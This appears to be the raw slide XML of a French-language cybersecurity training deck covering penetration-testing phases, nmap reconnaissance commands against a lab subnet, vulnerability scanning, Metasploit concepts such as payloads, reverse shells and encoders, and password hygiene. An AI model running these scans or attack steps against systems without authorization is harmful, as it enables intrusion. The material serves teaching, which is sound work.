              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Nscan</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Zmap</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Masscan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Ping : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>ping 10.7.1.226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Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Finding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> host and scanning network </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>learning.oreilly.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>library</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>view</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>ceh-certified-ethical</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>1. check for live </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>systems</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p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nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>sP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> 10.7.1.0/24</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>2. check for open ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(port 80, 443 for web)</a:t>
            </a:r>
          </a:p>
          <a:p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nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>sT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> -p 80,443 10.7.1.0/24</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>T : for TCP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> 3-way handshake (Full Open scan)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>message 1 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>i'm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>prot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> 443 Are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theire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> (SYN)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>message 2 : yes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>i'm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>thiere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>, (SYN ACK)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>message 3 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>let's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> talk (ACK)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>More </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>detect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> by the IDS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>3-way handshake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connection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nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>sS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> -p 80,443 10.7.1.0/24</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>S : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Stealthy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>half</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Open Scan)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(2way handshake)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nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>sT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> 10.7.1.226</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>ip.addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> eq 10.7.1.226</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>click one </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>converstation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> and "</a:t>
            </a:r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filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Perform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> banner </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>grabbing</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>detection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
          </a:p>
          <a:p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nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>sO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> 10.7.1.226</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Mora options </a:t>
            </a:r>
          </a:p>
          <a:p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nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> -A 10.7.1.226</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>5. scan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>namp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> --script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>vuln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> 10.7.1.226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https://sectools.org/tag/vuln-scanners/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https://hassen-hannachi.medium.com/installing-openvas-on-kali-linux-a54baeaf806a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://medium.com/@careertechnologymiraroad/openvas-scanner-fa518e9301f3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://medium.com/@kennithlowy/installing-openvas-step-by-step-guide-0aa83239a34b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://medium.com/@sonya.moisset/guide-de-s%C3%A9curit%C3%A9-pour-les-logiciels-open-source-meilleures-pratiques-pour-s%C3%A9curiser-vos-projets-c7ea78acb615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C3AD6-069E-4418-80E4-9BD64100A97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691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https://github.com/SitrakaResearchAndPOC/docker_metasploit_metasploitable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://medium.com/@habibsemouma/setting-up-metasploitable2-and-kali-in-docker-for-pentesting-6b71a089c4a2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://hub.docker.com/r/tleemcjr/metasploitable2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71D0F-FC3E-4B65-91AA-91E1A3FA117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170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5B8513-95DC-146A-6C3F-4D4DC0860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911337-121C-0856-92B7-BD9DB2F63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7A0374-C046-1340-0064-B593081B7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F726-CD05-43F2-B45E-6B5039A4D86D}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>14/01/2025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2267EF-3670-3D89-F566-42987540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81D58D-6233-8D44-A609-CA8CA52EB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5AA8-5F4B-437C-A0FD-3A5CB1B6D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514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96D256-6C4F-5C1E-CCCE-9EF324D39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5C04B61-69DF-6802-A014-BFA876084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6FCA3E-92F8-C797-0412-66A8CF47E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F726-CD05-43F2-B45E-6B5039A4D86D}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>14/01/2025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11E61B-A5A3-0908-20D0-3C91743C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557E83-5F6B-0E18-2942-28CBD8E6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5AA8-5F4B-437C-A0FD-3A5CB1B6D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5260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1319A0-1AD0-093A-2DAD-A70298E854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FDFF89F-5618-3CF8-55DD-EDA7DC892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C1F635-A063-D0E8-3401-0A11F9E7F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F726-CD05-43F2-B45E-6B5039A4D86D}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>14/01/2025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66C0CD-20B7-5A59-ADEE-8E5852974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23C999-413C-B2D2-2F50-4A76C9FCE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5AA8-5F4B-437C-A0FD-3A5CB1B6D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7510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30B04-9A5F-D746-51A4-1D410E39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15512C-C16C-35D5-1BAE-C85AC8CA4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ECE240-DF9C-1CB1-04B7-C873673D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F726-CD05-43F2-B45E-6B5039A4D86D}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>14/01/2025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9A24C8-BED9-10C5-9786-18F5D6E14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DD441F-FDEB-224E-97F3-AC2F5F54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5AA8-5F4B-437C-A0FD-3A5CB1B6D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0598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8A2421-DE9F-1303-3393-0612A3060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E46500-5725-C372-88BD-8331DEA27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8F90A9-9DB4-505A-A7CA-1B67CF449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F726-CD05-43F2-B45E-6B5039A4D86D}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>14/01/2025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67BAFF-F38B-8B15-4B15-F220D429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8CC7E0-E549-2FD5-D542-47FB4493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5AA8-5F4B-437C-A0FD-3A5CB1B6D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9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6466E4-DC07-0AB2-0A9B-1BC6ECD8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D2F774-BE30-8262-6FD4-1DE969F61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3D95803-ABBD-1B98-9E0A-25BBDBC02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759D64-030E-C0C2-7D47-9E5C3C5C4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F726-CD05-43F2-B45E-6B5039A4D86D}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>14/01/2025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3BB0D7-3EA1-1BB8-D29C-D6C138BB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1EE377-16C1-13D0-A315-A7DEA024E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5AA8-5F4B-437C-A0FD-3A5CB1B6D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6832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0AB160-D97A-82FC-885B-D02E9B088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F7EC83-39BB-CC37-0817-4DC347E53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3915EC7-B1D4-8CF3-49CD-0FFD7967B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C8BFBA2-A12C-6020-F839-71971FBE40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4D2C7E-CD7D-6430-6702-44A5F38595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41B8662-F18F-DE6B-7564-6EF33C0F0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F726-CD05-43F2-B45E-6B5039A4D86D}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>14/01/2025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519C38A-5739-8D7E-21C8-DB10F202F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FD59A5D-2694-A841-90A8-E2DAFC4F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5AA8-5F4B-437C-A0FD-3A5CB1B6D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6598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D856B-0F97-430D-8F06-DA90077C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25041-660B-A53B-4434-37969C4A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F726-CD05-43F2-B45E-6B5039A4D86D}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>14/01/2025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CA4557-FD61-22CB-DD6F-77ECA7E67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0DB031-9EA8-2C57-A6E4-583653A3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5AA8-5F4B-437C-A0FD-3A5CB1B6D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20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987935A-4118-2033-62E7-1A589B213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F726-CD05-43F2-B45E-6B5039A4D86D}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>14/01/2025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BCE8953-7687-C5D5-C988-DB45B5FD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B7AB87-79ED-8BD7-1622-8483F89FB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5AA8-5F4B-437C-A0FD-3A5CB1B6D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06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803A15-0DC4-3D80-632F-2CA04BCF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F484D5-7AAD-2593-66B0-3FCB6B8D9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BA9FD26-D6CA-93BC-E7C8-36B27D3A7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C285497-6434-CB97-B781-4EF07996F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F726-CD05-43F2-B45E-6B5039A4D86D}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>14/01/2025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0A9A1D1-11AC-D423-C6B4-C5CF02AB1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13B4D8-6D93-C452-8A10-9D2869753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5AA8-5F4B-437C-A0FD-3A5CB1B6D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564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D01C12-7585-14EA-D3D9-B2A3F30B8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C01D439-DE6E-BCAF-2E5A-F7BD9322E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EE5369B-1A02-0C93-D779-DF3213862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D31143-8C6B-35D2-A903-13B742746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F726-CD05-43F2-B45E-6B5039A4D86D}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>14/01/2025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8DD0EC5-BE85-C64F-5003-AC493F7D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D0B5D6-D7BA-D561-B343-43F10591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5AA8-5F4B-437C-A0FD-3A5CB1B6D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064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0B219DF-F913-29C2-B3EB-05B6AF69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8AE5FD-6B98-B9C5-A63C-865FB4A25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BDB7D5-EEC0-D90D-D054-1C8630CE3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CF726-CD05-43F2-B45E-6B5039A4D86D}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>14/01/2025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14F28A-A299-8F4F-4A89-8FB598514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FBD233-00F0-2FE1-9925-9D667C2FD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C5AA8-5F4B-437C-A0FD-3A5CB1B6D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859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A46F80-C0A2-26B5-15A8-DE179D93C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949" y="1519084"/>
            <a:ext cx="11720052" cy="4079536"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p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DEVSECOPS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Fédération d’identité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Audit-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BugHunting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42519A-6409-79E9-E000-017026501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485" y="4563122"/>
            <a:ext cx="9959966" cy="103549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47935435-D877-73BB-E95C-404780BAD02C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="527116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Dr. Rakotondramanana Radiarisainana Sitraka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771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2" y="170481"/>
            <a:ext cx="11983538" cy="65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3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277" y="186170"/>
            <a:ext cx="8983851" cy="667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50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70" y="250556"/>
            <a:ext cx="11260164" cy="558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5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915" y="728420"/>
            <a:ext cx="9763588" cy="539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20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36" y="929898"/>
            <a:ext cx="10368180" cy="526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5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89" y="1069383"/>
            <a:ext cx="8795883" cy="466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41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1100"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1507039" y="526942"/>
            <a:ext cx="10504148" cy="56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81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218" y="960897"/>
            <a:ext cx="9802944" cy="50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77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9314"/>
            <a:ext cx="10148404" cy="490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4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30" y="914400"/>
            <a:ext cx="10532270" cy="528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85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9C921B-3DBB-62E0-640B-E34934EF3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178320"/>
            <a:ext cx="12101362" cy="1409850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MOTS DE PASSES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312A-BA4A-25B8-A35F-E88D9E275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N’utiliser pas des mots de passe différents usages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Utiliser de mots de passe sécurisé : passe phrase avec des </a:t>
            </a:r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combinaisons robustes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Changer couramment les mots de passes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3811124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39" y="1131377"/>
            <a:ext cx="9175864" cy="476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16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608" y="790413"/>
            <a:ext cx="10248824" cy="557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0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05" y="774915"/>
            <a:ext cx="9920591" cy="515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55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62" y="480447"/>
            <a:ext cx="11342146" cy="586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26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53" y="836909"/>
            <a:ext cx="10371152" cy="538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91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69" y="1053885"/>
            <a:ext cx="9618697" cy="51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85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16" y="774915"/>
            <a:ext cx="10801108" cy="498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88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94" y="1084882"/>
            <a:ext cx="9772637" cy="457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14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54" y="790413"/>
            <a:ext cx="9386104" cy="533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19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63" y="697424"/>
            <a:ext cx="9298631" cy="55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14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BFF767-B0D2-0919-7A8C-E9747DE61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Combien de temps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55E028-BE90-7DC5-A8A4-4C2FF4710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07DE5F-EB89-FC7F-DFBC-BC0D81C6B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50" y="2059595"/>
            <a:ext cx="87915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45" y="1053884"/>
            <a:ext cx="11232971" cy="477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94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07" y="774916"/>
            <a:ext cx="9662603" cy="525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39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56F728-58F7-E897-512B-6E10555B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DEMOS KEYCLOAK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3C205A-CBC7-DE24-291C-F80110A71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625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99E38247-A3ED-1B6D-D900-C10A0F2BAC3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="489533"/>
            <a:ext cx="10515600" cy="192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AUDIT DE SECURITE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dirty="0"/>
            </a:br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A6A85B0E-ADE5-D9F1-D63A-49CEB9781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0701"/>
            <a:ext cx="10787743" cy="4737754"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:norm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de reconnaissance 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de l’exploitation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de post-exploitation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(CYBER KILL CHAIN)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4064388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599E44-A056-28D0-EDE0-A8891328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 FACEBOOK</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>CYBER SECURITY(KALI)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4682451-982C-D227-B01F-3DCA051FD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545" y="-45745"/>
            <a:ext cx="4272455" cy="6903745"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2547744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38C85A-BC84-FAC5-2E41-99B77866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de reconnaissance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BE4335-63D0-BAA5-92EF-281AE07A7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Manuelle ou automatisée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Existence des résultats faux positifs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Nécessitant des accords du chef hiérarchique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au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hackback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907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636709-3DDC-3B0F-14FC-23555E36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exploitation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3FCE9C-5DC4-FEC5-4835-26C8E2845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Eliminer les faux positifs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Nécessitant des accords du chef hiérarchique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Sauvegarde obligatoire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295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2936B-A6D9-B3B0-D9E6-FDDB230C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53157"/>
            <a:ext cx="11353800" cy="1325563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Outils de reconnaissance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F6CF135-408D-EE4F-2F40-B7F1934F2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Whois</a:t>
            </a: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netcraft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Nslookup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Nmap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341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6DF9CB-CE34-1B4E-4FC7-6E932D40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DEMOS : OUTILS RECON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49AACC-7D04-DC23-D492-10C3F3B57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409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4944F2-E4CC-F0AF-5ECD-FB5BA2D0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MACHINES VULNERABLES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5DB5BB-C0F8-5BFF-A122-4F06098A8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Difficile à trouver (création de LAB ou CTF)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Lien en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33648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D269D-C522-BB6B-BF56-52BB7DC7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1094720" cy="1373755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de GESTION DE MOT DE PASSE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A19CC4-6151-1C95-A089-EC6CEAEE2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PASS : sur ordinateur local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PASSBOLT : en ligne ou sur ordinateur local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Autres fournisseurs de gestions de mot de passe : </a:t>
            </a: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NordVPN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CyberGhost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541196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FF9414-33ED-1CFA-3DA4-320ABB08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Prise en main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metasploit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metasploitable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2AEF11-BB56-F6F9-D37E-F7E10E244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65221" cy="4890485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Pourquoi et pourquoi pas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metasploit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l’introduction en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metasploit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(liens en descriptions)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Metasploitable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un système plein de vulnérabilité pour s’introduire en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metasploit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CTF et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TryHackMe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Serveur pour capturer des drapeaux (pour voir le niveau du pirate)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1032551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B7E563-DEE6-9356-EC47-7766A460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Metasploit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977DD1-14D9-469A-5C8C-0AF02E4E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B397A6-C467-C621-6E8E-E12909AF0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1845734"/>
            <a:ext cx="5187378" cy="37518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C871982-3442-EB61-9444-F8AD861E6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1577159"/>
            <a:ext cx="47244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19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2936B-A6D9-B3B0-D9E6-FDDB230C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53157"/>
            <a:ext cx="11353800" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:norm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msfconsole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pour la version console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metasploit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7E82B-BE01-3248-3FF1-A1E97CA1E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Auxilliary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Outil de scan tel que le port d’une machine  cible, ou encore d’un service.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Tapez : show ???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: outil permet l’accès à des donnés confidentiel des identifiants ou des mots de passe de service ou d’application, le post-exploitation vient après l’exploitation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654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2936B-A6D9-B3B0-D9E6-FDDB230C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53157"/>
            <a:ext cx="11353800" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:norm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msfconsole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pour la version console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metasploit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7E82B-BE01-3248-3FF1-A1E97CA1E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 : code d’exploitation par lequel un attaquant profitera d’un défaut système. On utilise un exploit d’une application ou d’un service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utilisera un exploit pour attaquer une machine de façon à lui produire un résultat que les développeurs n’aurait pas envisager voir même anticiper. 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Tapez : show exploits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264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2936B-A6D9-B3B0-D9E6-FDDB230C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53157"/>
            <a:ext cx="11353800" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:norm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msfconsole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pour la version console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metasploit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7E82B-BE01-3248-3FF1-A1E97CA1E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75" y="1491658"/>
            <a:ext cx="11489725" cy="53663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Encoders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Outils qui permettent de dissimuler des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 des exploits ou les deux combinés  en créant des couches sélectionnées par l’attaquant selon le système qui est utilisé sur la machine cible.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code que l’attaque souhaite exécuté sur la machine cible. Par exemple un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revese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shell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 crée une connexion distante depuis la machine cible vers l’attaquant. C’est la machine cible qui se connecte à la machine de l’attaquant. Il y a certain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d’un exploit qui engendre aussi un RCE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Remote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Nops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 code qui permet de faire fonctionner un exploit ou un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 une machine ou sur d’autres extension puis spécifique. (par exemple du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5071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E16BCD-2ABA-410A-270A-518D8C420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Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>reverse  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>et binding 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217474-9424-4872-12C8-D0954E4F5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8E8A6F-2CD1-5090-3DC7-9A7FA84B1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8133217" cy="428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69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F63DDD-4253-4BA8-3B14-160B1BF24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EXPLOITATION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89FA56-C0EC-4E84-2AC3-48E96650F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681611"/>
            <a:ext cx="11094720" cy="5012266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Disfonctionnement (bug)</a:t>
            </a:r>
          </a:p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Déni de services</a:t>
            </a:r>
          </a:p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Avec ou sans interactions utilisateurs</a:t>
            </a:r>
          </a:p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RCE (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Remote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Confidentialité  - Authenticité – Intégrité – Non répudiation</a:t>
            </a:r>
          </a:p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Disponibilité</a:t>
            </a:r>
          </a:p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Preuve</a:t>
            </a:r>
          </a:p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Anonymité</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3124404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37619-5336-EF64-518E-B38E834CD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EXEGOL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AD02FF-D565-F417-812F-6570497FE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Wrap docker for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pentesting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378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108AF-CBC3-CB48-ABB4-831C7900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EXPLOITATION : COMMENT CRÉER DES FAILLES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713333-E4EE-13C9-B988-3E9F510BB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Overflow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 de processus sur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overflow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overflow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oscp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Injection (input)</a:t>
            </a:r>
          </a:p>
          <a:p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Brute forcing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Race condition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Changement de (output)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Fuzzing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Fuzzing des inputs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 engineering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12747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81C84-1D90-2DFC-6130-8CFD5C00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OVERFLOW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5B83DD-0A60-7764-53E7-FF2936BBB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7312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008F64-88FB-C309-EA43-16543C0A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Attaque de brutes forces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E4B6F1-B572-50ED-2B9C-29578C2FF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Tester des mots de passes faibles (court, non aléatoire …) avec les alphabets choisis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Vérifier si vrai ou faux selon le cas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Captcha (surtout sur la création de compte automatisé)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Bannissement après plusieurs échecs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
